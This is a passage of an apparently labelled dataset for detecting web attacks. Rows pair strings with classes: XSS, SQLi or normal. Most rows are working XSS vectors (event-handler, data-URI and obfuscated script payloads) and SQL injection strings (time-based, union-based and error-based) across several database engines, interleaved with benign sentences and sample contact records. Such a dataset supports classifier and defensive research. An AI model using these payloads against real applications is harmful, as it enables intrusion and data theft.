src=""data:text/html;base64,%(base64)s"">",1,XSS,6270 "<div draggable=""true"" contenteditable>drag me</div><col ondragover=alert(1) contenteditable>drop here</col>",1,XSS,1182 "1%"" ) ) ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #",2,SQLi,16787 "<svg><use href=""data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoMSkiIC8+Cjwvc3ZnPg==#x"" /></svg>",1,XSS,63 Please select one.,3,normal,24786 Join the virtual meeting.,3,normal,22658 <tr id=x tabindex=1 onbeforeactivate=alert(1)></tr>,1,XSS,5424 "1 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) -- ctdx",2,SQLi,11709 "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ( ""%"" = """,2,SQLi,13447 "<div draggable=""true"" contenteditable>drag me</div><a ondrop=alert(1) contenteditable>drop here</a>",1,XSS,1461 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( 'oskf' like 'oskf",2,SQLi,13504 or 1 = 1 --,2,SQLi,22397 <style id=x tabindex=1 onactivate=alert(1)></style>,1,XSS,5360 "{""id"":null,""name"":""aside""}",3,normal,27443 "1"" ) ) as ynuw where 9138 = 9138",2,SQLi,20289 <image id=x tabindex=1 onbeforedeactivate=alert(1)></image><input autofocus>,1,XSS,2188 "1'|| ( select 'xbvz' from dual where 1632 = 1632 union all select null,null,null,null,null,null,null,null--",2,SQLi,13769 "<;<;SCRIPT>;alert("";XSS"";);//<;<;/SCRIPT>;",1,XSS,7339 "1'+ ( select 'ixvd' where 4772 = 4772 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) ) +'",2,SQLi,11019 "<style>@keyframes slidein {}</style><br style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></br>",1,XSS,454 "-1891' in boolean mode ) union all select 6680,6680,6680,6680,6680,6680,6680,6680#",2,SQLi,15086 "1"" ) ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,18997 top[“al”+”ert”](1),1,XSS,9781 "<style>@keyframes x{}</style><caption style=""animation-name:x"" onanimationstart=""alert(1)""></caption>",1,XSS,1397 "-1254"" or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual )",2,SQLi,10050 "{""id"":null,""firstName"":""Gnana"",""lastName"":""Kannan"",""address"":""735 Crawford Dr"",""city"":""965"",""telephone"":""5013555939""}",3,normal,27068 "<details draggable=""true"" ondrag=""alert(1)"">test</details>",1,XSS,3891 "1 or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) -- fwzl",2,SQLi,10890 Delete the incorrect entry.,3,normal,22581 "<style>:target {transform: rotate(180deg);}</style><center id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></center>",1,XSS,598 "<slot oncut=""alert(1)"" contenteditable>test</slot>",1,XSS,5622 "-6370' ) ) as sims where 9388 = 9388 union all select 9388,9388,9388,9388,9388,9388,9388,9388#",2,SQLi,14434 "1 ) ) as kycl where 8008 = 8008 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,13700 -2429%' or 6890 = 5846,2,SQLi,21423 "1"" ) as hhxx where 3372 = 3372 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11079 "-8841%"" ) or 4361 = 1910",2,SQLi,21202 "<mark oncut=""alert(1)"" contenteditable>test</mark>",1,XSS,5641 "<audio onerror=""javascript:alert(1)""><source>//INJECTX",1,XSS,4851 "<acronym onkeypress=""alert(1)"" contenteditable>test</acronym>",1,XSS,3301 <video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23,1,XSS,66 "-4825%' ) union all select 6804,6804,6804,6804,6804,6804,6804--",2,SQLi,16854 "UNION ALL SELECT system_user(),user();#",2,SQLi,19554 "<acronym draggable=""true"" ondragleave=""alert(1)"">test</acronym>",1,XSS,3034 "Activate your Priority Pass Select membershipThe Bonvoy Brilliant card comes with Priority Pass Select membership, which gets you access to over 1,200 airport lounges around the world.",3,normal,26413 "1 ) as attr where 8085 = 8085 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12119 <legend id=x tabindex=1 onbeforedeactivate=alert(1)></legend><input autofocus>,1,XSS,2096 "Just open Health, and select ""browse"" in the lower right corner.",3,normal,25934 "select * from users where id = 1 or 1#""? = 1 or 1 = 1 -- 1",2,SQLi,17335 <fieldset onpointermove=alert(1)>XSS</fieldset>,1,XSS,6184 1 ) waitfor delay '0:0:5'--,2,SQLi,20889 "1"" ) where 8196 = 8196",2,SQLi,21430 "<multicol oncut=""alert(1)"" contenteditable>test</multicol>",1,XSS,3858 "<dialog oncopy=""alert(1)"" contenteditable>test</dialog>",1,XSS,4461 <summary onpointerover=alert(1)>XSS</summary>,1,XSS,6604 -7532 ) ) ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( 8332 = 8332,2,SQLi,10247 -6341' or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and 'ugys' = 'ugys,2,SQLi,12938 "</b style=""expr/**/ession(alert('vulnerable'))"">",1,XSS,6083 "-4637' union all select 9361,9361,9361,9361,9361,9361,9361,9361#",2,SQLi,16792 "<style>@keyframes x{}</style><s style=""animation-name:x"" onanimationend=""alert(1)""></s>",1,XSS,1831 Only a select handful will have the opportunity to play it before it goes on everybody's Christmas list.,3,normal,25823 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ""vzft"" = ""vzft",2,SQLi,16584 Filter the irrelevant comments.,3,normal,22696 1'|| ( select 'pcps' from dual where 7255 = 7255 and 7121 = 4603,2,SQLi,16810 "<svg/onload=alert(String.fromCharCode(88,83,83))>",1,XSS,5840 "-1164"" ) union all select 6617,6617,6617,6617,6617,6617--",2,SQLi,17500 "<style>@keyframes x{}</style><bgsound style=""animation-name:x"" onanimationend=""alert(1)""></bgsound>",1,XSS,1486 "<? foo=""><script>javascript:alert(1)</script>"">",1,XSS,6090 "<center onmouseover=""alert(1)"">test</center>",1,XSS,6914 "Specimens intended for the herbarium should be collected when possible in dry weather, care being taken to select plants or portions of plants in sufficient number and of a size adequate to illustrate all the characteristic features of the species.",3,normal,25532 "1' ) ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,16915 1' ) where 8274 = 8274,2,SQLi,21532 and 1=1,2,SQLi,22516 "<thead draggable=""true"" ondragleave=""alert(1)"">test</thead>",1,XSS,3649 "<em onbeforecopy=""alert(1)"" contenteditable>test</em>",1,XSS,4931 "1 ) ) ) union all select null,null,null,null#",2,SQLi,19062 "1%' ) union all select null,null#",2,SQLi,20221 "<param onmousemove=""alert(1)"">test</param>",1,XSS,7347 -5291' ) ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( 'tmpm' = 'tmpm,2,SQLi,10134 "<applet onkeydown=""alert(1)"" contenteditable>test</applet>",1,XSS,3833 ",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,18990 Select educate.,3,normal,24718 1' ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( ( 'qiau' = 'qiau,2,SQLi,15674 We've also included the Dow's return and select foreign currencies.,3,normal,25170 Select coffee.,3,normal,24509 "1 ) ) as pjjz where 8384 = 8384 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,12276 1 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337,2,SQLi,19571 "-4807' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and 'wwki' = 'wwki",2,SQLi,10464 "<body onLoad=""alert('XSS');""",1,XSS,9619 "<dialog onmouseenter=""alert(1)"">test</dialog>",1,XSS,6693 "`""><\x3Cscript>javascript:alert(1)</script>",1,XSS,7058 """ Scroll down to ""importance markers"" and select ""no markers.",3,normal,26476 "1"" ) ) and elt ( 4249 = 4249,7259 ) and ( ( ""abcm"" like ""abcm",2,SQLi,17108 <del onpointermove=alert(1)>XSS</del>,1,XSS,8663 "<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>",1,XSS,29 "1"" ) rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #",2,SQLi,16974 "1'|| ( select 'aoad' where 8795 = 8795 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) ) ||'",2,SQLi,10991 "<caption oncopy=""alert(1)"" contenteditable>test</caption>",1,XSS,4149 "<div draggable=""true"" contenteditable>drag me</div><command ondragover=alert(1) contenteditable>drop here</command>",1,XSS,807 "{""id"":null,""firstName"":""Vanessa"",""lastName"":""Liew"",""address"":""111 North Bridge Road #05-32 Peninsula Plaza"",""city"":""609"",""telephone"":""5016095414""}",3,normal,26922 "1' ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ( 'ogpg' = 'ogpg",2,SQLi,16689 1%' ) ) and 7160 = 7249--,2,SQLi,21145 "select * from generate_series ( 9709,9709,case when ( 9709 = 7795 ) then 1 else 0 end ) limit 1--",2,SQLi,14261 "-5738"" ) as efbn where 8541 = 8541 union all select 8541,8541,8541,8541,8541,8541,8541,8541#",2,SQLi,14607 1 ) and 3659 = 5475 and ( 8949 = 8949,2,SQLi,19831 "1 or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )",2,SQLi,13444 "<i onmouseout=""alert(1)"">test</i>",1,XSS,9338 select * from users where id = '1' + $+%\ or 1 = 1 -- 1',2,SQLi,17580 "),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,18907 Select your player.,3,normal,24840 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( '%' = '",2,SQLi,14176 "1"" ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ""rqxd"" = ""rqxd",2,SQLi,11124 "1"" ) ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,15069 "Reports to the Postmaster-General upon proposals for transferring to the Post Of f ice the Telegraphs throughout the United Kingdom (1868); Special Reports from Select Committee on the Electric Telegraphs Bills (1868, 1869); Report by Mr Scudamore on the reorganization of the Telegraph system of the United Kingdom (1871); Journ.",3,normal,25756 "1"" where 2677 = 2677 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) --",2,SQLi,15412 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--",2,SQLi,14810 "<div draggable=""true"" contenteditable>drag me</div><title ondragover=alert(1) contenteditable>drop here</title>",1,XSS,987 "1' in boolean mode ) and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14228 Where's the missing remote?,3,normal,22578 "1 ) where 5232 = 5232 union all select null,null,null#",2,SQLi,17966 "<legend onmouseenter=""alert(1)"">test</legend>",1,XSS,6586 They planted colorful flowers.,3,normal,23002 "<script>Object.prototype.url = 'data:,alert(1)//' </script> <script> $.getScript('https://google.com/')</script>",1,XSS,927 Select your dream engagement ring.,3,normal,24368 "<div draggable=""true"" contenteditable>drag me</div><aside ondragover=alert(1) contenteditable>drop here</aside>",1,XSS,1005 "and (select substring(@@version,2,1))='i'",2,SQLi,19325 "<dfn oncontextmenu=""alert(1)"">test</dfn>",1,XSS,8038 "avascript:alert(1)"">XSS</a>",1,XSS,9643 "1"" where 3227 = 3227 waitfor delay '0:0:5'--",2,SQLi,19092 "\',desc users, --",2,SQLi,22089 1 ) union all select null#,2,SQLi,21013 <thead onpointermove=alert(1)>XSS</thead>,1,XSS,7753 Select the ideal location.,3,normal,24274 ( select * from ( select ( sleep ( 5 ) ) ) srmq ) # gkkx,2,SQLi,17689 Sort alphabetically the documents on your desk.,3,normal,22905 "<iframe src=""javascript:document.vulnerable=true; <",1,XSS,5351 1 and 7533 = 7533,2,SQLi,22107 "1'+ ( select 'ixza' where 4374 = 4374 union all select null,null,null--",2,SQLi,16107 select ( case when ( 1014 = 4280 ) then 1014 else 1014* ( select 1014 from mysql.db ) end ) #,2,SQLi,14546 "23 or 1 = 1, --",2,SQLi,22168 "The method in the latter case is to select roots averaging the thickness of the little finger, to cut these into lengths of about 3 or 4 in., and to plant them FIG.",3,normal,25413 "{""id"":null,""name"":""Aromatisse""}",3,normal,27527 "<colgroup draggable=""true"" ondragstart=""alert(1)"">test</colgroup>",1,XSS,2800 "<;XML SRC="";http://ha.ckers.org/xsstest.xml""; ID=I>;<;/XML>;",1,XSS,3456 Such a select committee must focus on two critical tasks.,3,normal,25518 "1"" ) ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ( ""gfwz"" = ""gfwz",2,SQLi,11087 1' ) ) waitfor delay '0:0:5'--,2,SQLi,20550 "From the ""Select and Mask"" menu, simply click anywhere on the image and it will automatically identify and select the various subjects in the image.",3,normal,26167 "1"" and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ""nzgn"" = ""nzgn",2,SQLi,10777 "<tt onkeydown=""alert(1)"" contenteditable>test</tt>",1,XSS,5597 <body ontouchmove=alert(1)>,1,XSS,9642 <body id=x tabindex=1 ondeactivate=alert(1)></body><input id=y autofocus>,1,XSS,2326 "1 ) where 5378 = 5378 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,11191 <img onpointerover=alert(1)>XSS</img>,1,XSS,8648 "1' ) where 8268 = 8268 union all select null,null,null,null--",2,SQLi,17084 "1' ) ) ) or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15290 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24",2,SQLi,14245 "<p draggable=""true"" ondragenter=""alert(1)"">test</p>",1,XSS,5443 Join the chat.,3,normal,22861 "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",2,SQLi,13295 Select choose.,3,normal,24567 <image2 onpointerdown=alert(1)>XSS</image2>,1,XSS,7185 -7111' or ( 8459 = 8459 ) *4906,2,SQLi,20404 "&lt;IMG DYNSRC=\""javascript&#058;alert('XSS')\""&gt;",1,XSS,5343 "<video draggable=""true"" ondragstart=""alert(1)"">test</video>",1,XSS,3732 alert&#40;1&#41,1,XSS,9811 "1' ) where 6248 = 6248 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,15556 "1%"" and 7533 = 7533 and ""%"" = """,2,SQLi,20493 "<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>",1,XSS,24 "1"" ) ) as vbpl where 3885 = 3885 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) --",2,SQLi,15083 "1"" ) ) ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( ( ""lynw"" like ""lynw",2,SQLi,13898 *{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */,1,XSS,3415 "<h1 onmousemove=""alert(1)"">test</h1>",1,XSS,8888 ",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,17744 "1' ) where 6746 = 6746 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) --",2,SQLi,11600 <area id=x tabindex=1 onbeforeactivate=alert(1)></area>,1,XSS,4504 "<a href=""javascript:x='&percnt;27-alert(1)-%27';"">XSS</a>",1,XSS,3982 "1%"" ) ) ) and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14831 "-2951"" or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) )",2,SQLi,10798 <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>,1,XSS,2165 Select your battle.,3,normal,24919 <frame onblur=alert(1) tabindex=1 id=x></frame><input autofocus>,1,XSS,2898 "<script onmouseleave=""alert(1)"">test</script>",1,XSS,6630 ") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337",2,SQLi,18153 "1' ) ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ( 'xpks' like 'xpks",2,SQLi,11048 if ( 7899 = 7899 ) select 7899 else drop function zbbp--,2,SQLi,17658 "{""id"":null,""firstName"":""Tan"",""lastName"":""May"",""address"":""29 Cherry St #7073"",""city"":""868"",""telephone"":""1028462607""}",3,normal,27054 "Greater London (in the sense in which that name might then have been applied) was governed by the inhabitants of each parish in vestry assembled, save that in some instances parishes had elected select vestries under the provisions of the Vestries Act 1831.",3,normal,26135 AS INJECTX WHERE 1=1 AND 1=0--,2,SQLi,20508 Select the ideal temperature for comfort.,3,normal,24049 <command id=x tabindex=1 onbeforedeactivate=alert(1)></command><input autofocus>,1,XSS,1994 "{""id"":null,""firstName"":""Cecilia"",""lastName"":""Chng"",""address"":""101 West End Avenue, New York NY 10023"",""city"":""717"",""telephone"":""3580817642""}",3,normal,27455 <svg><path><animateMotion onend=alert(1) dur=1s repeatCount=1>,1,XSS,3197 Kohl's: $50 off select luggage purchases of $200 or more using code LUGGAGE50; $50 off select patio furniture and outdoor decor purchases of $200 or more using code PATIO50.,3,normal,25923 "<pre onmouseleave=""alert(1)"">test</pre>",1,XSS,8118 "1' in boolean mode ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14258 "`""'><img src=xxx:x onerror\x0C=javascript:alert(1)>",1,XSS,5329 "<style>@keyframes slidein {}</style><b style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></b>",1,XSS,466 1 ) ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,17195 -2983' ) or 8571 = 8571--,2,SQLi,21118 "<code onbeforecut=""alert(1)"" contenteditable>test</code>",1,XSS,4371 "1'+ ( select syrz where 7699 = 7699 union all select null,null,null#",2,SQLi,16376 "1"" and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a )",2,SQLi,11237 select ( case when ( 1039 = 5127 ) then 1039 else 1039* ( select 1039 from information_schema.character_sets ) end ) #,2,SQLi,13213 "1"" ) ) ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12005 "<del onbeforepaste=""alert(1)"" contenteditable>test</del>",1,XSS,4239 "-8429' ) ) ) or make_set ( 9354 = 9354,7185 ) and ( ( ( 'bwih' like 'bwih",2,SQLi,15856 "<q onmousedown=""alert(1)"">test</q>",1,XSS,9242 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#",2,SQLi,14011 "{""id"":null,""name"":""Bulbasaur""}",3,normal,27091 "-4205' ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) )",2,SQLi,10672 -9711'+ ( select 'ckpj' where 8338 = 8338 union all select 8338--,2,SQLi,16729 <INPUT TYPE=�IMAGE� SRC=�javascript:alert(�XSS�);�>,1,XSS,5355 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--",2,SQLi,12569 "{""id"":null,""firstName"":"""",""lastName"":""Mohd"",""address"":""2221 W. MARKET STREET, POTTSVILLE PA 17901"",""city"":""717"",""telephone"":""429098623""}",3,normal,27376 "{""id"":null,""firstName"":""Tan"",""lastName"":""Jingheng"",""address"":""115 ENTERPRISE COURT, GREENWOOD SC 29649"",""city"":""219"",""telephone"":""4970578291""}",3,normal,27187 "1"" ) as jiiq where 6847 = 6847",2,SQLi,20538 "<div style=""xg-p:absolute;top:0;left:0;width:100%;height:100%"" onmouseover=""prompt(1)"" onclick=""alert(1)"">x</button>",1,XSS,796 "1'|| ( select 'kgfu' from dual where 2607 = 2607 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,11961 "{""id"":null,""firstName"":""Evon"",""lastName"":""Choong"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26795 "<nextid onmousedown=""alert(1)"">test</nextid>",1,XSS,6889 select * from users where id = '1' <@&@ or 1 = 1 -- 1',2,SQLi,17930 "1 where 2278 = 2278 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,11018 "<body onPageHide body onPageHide=""javascript:javascript:alert(1)""></body onPageHide>",1,XSS,1879 1%' ) ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( ( ( '%' = ',2,SQLi,15783 "1"" where 7158 = 7158",2,SQLi,21817 <marquee onpointermove=alert(1)>XSS</marquee>,1,XSS,6664 "1"" ) ) as maxe where 5883 = 5883 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,14396 """+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*",2,SQLi,18149 "AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--",2,SQLi,18993 1' ) where 6624 = 6624 and 5392 = 8258,2,SQLi,19778 "-7940%"" ) union all select 2779,2779,2779,2779,2779,2779,2779,2779,2779,2779#",2,SQLi,15442 Create poem.,3,normal,23068 "<fieldset onkeypress=""alert(1)"" contenteditable>test</fieldset>",1,XSS,3044 Up to 40% off select Smart Door Locks and Hardware,3,normal,25211 "<style>:target {color: red;}</style><dir id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></dir>",1,XSS,1045 "-9247' ) ) ) union all select 6964,6964,6964,6964,6964,6964,6964,6964,6964--",2,SQLi,15515 "1' or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,15280 &#x3c;,1,XSS,9871 Select taxi.,3,normal,24711 Congratulations to our very own @JulienMid and @Value247 for were selected on Team @Yassuo for the upcoming League of Legends Twitch Awards!... Will Value secure the three-peat? Will Julien wrap up his ninth championship? Find out all week!...,3,normal,26511 "<table onmousedown=""alert(1)"">test</table>",1,XSS,7389 "1' where 4272 = 4272 union all select null,null,null,null#",2,SQLi,17386 end and 'icny' like 'icny,2,SQLi,21107 "<audio autoplay onplay=alert(1)><source src=""validaudio.wav"" type=""audio/wav""></audio>",1,XSS,1846 "<figure draggable=""true"" ondrag=""alert(1)"">test</figure>",1,XSS,4280 "<audio onbeforecut=""alert(1)"" contenteditable>test</audio>",1,XSS,3837 "-8612' ) as toeu where 6357 = 6357 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10096 "<table onbeforepaste=""alert(1)"" contenteditable>test</table>",1,XSS,3462 "1' ) where 6634 = 6634 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) --",2,SQLi,15566 "{""id"":null,""name"":""successful""}",3,normal,27471 "<tr draggable=""true"" ondragleave=""alert(1)"">test</tr>",1,XSS,5027 "1"" ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ""tgdu"" = ""tgdu",2,SQLi,11597 "select * from users where id = 1 or ""{;"" or 1 = 1 -- 1",2,SQLi,17880 "1%"" and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ""%"" = """,2,SQLi,12949 <html ontouchcancel=alert(1)>,1,XSS,9596 "1%' ) ) ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ( ( '%' = '",2,SQLi,11577 <script>document.vulnerable=true;</script>,1,XSS,7334 "<dfn onkeydown=""alert(1)"" contenteditable>test</dfn>",1,XSS,5273 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>,1,XSS,277 -2658 ) as casi where 7364 = 7364 or 8245 = 9651--,2,SQLi,18510 "[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)",1,XSS,2694 "<figure oncontextmenu=""alert(1)"">test</figure>",1,XSS,6324 <image src=validimage.png 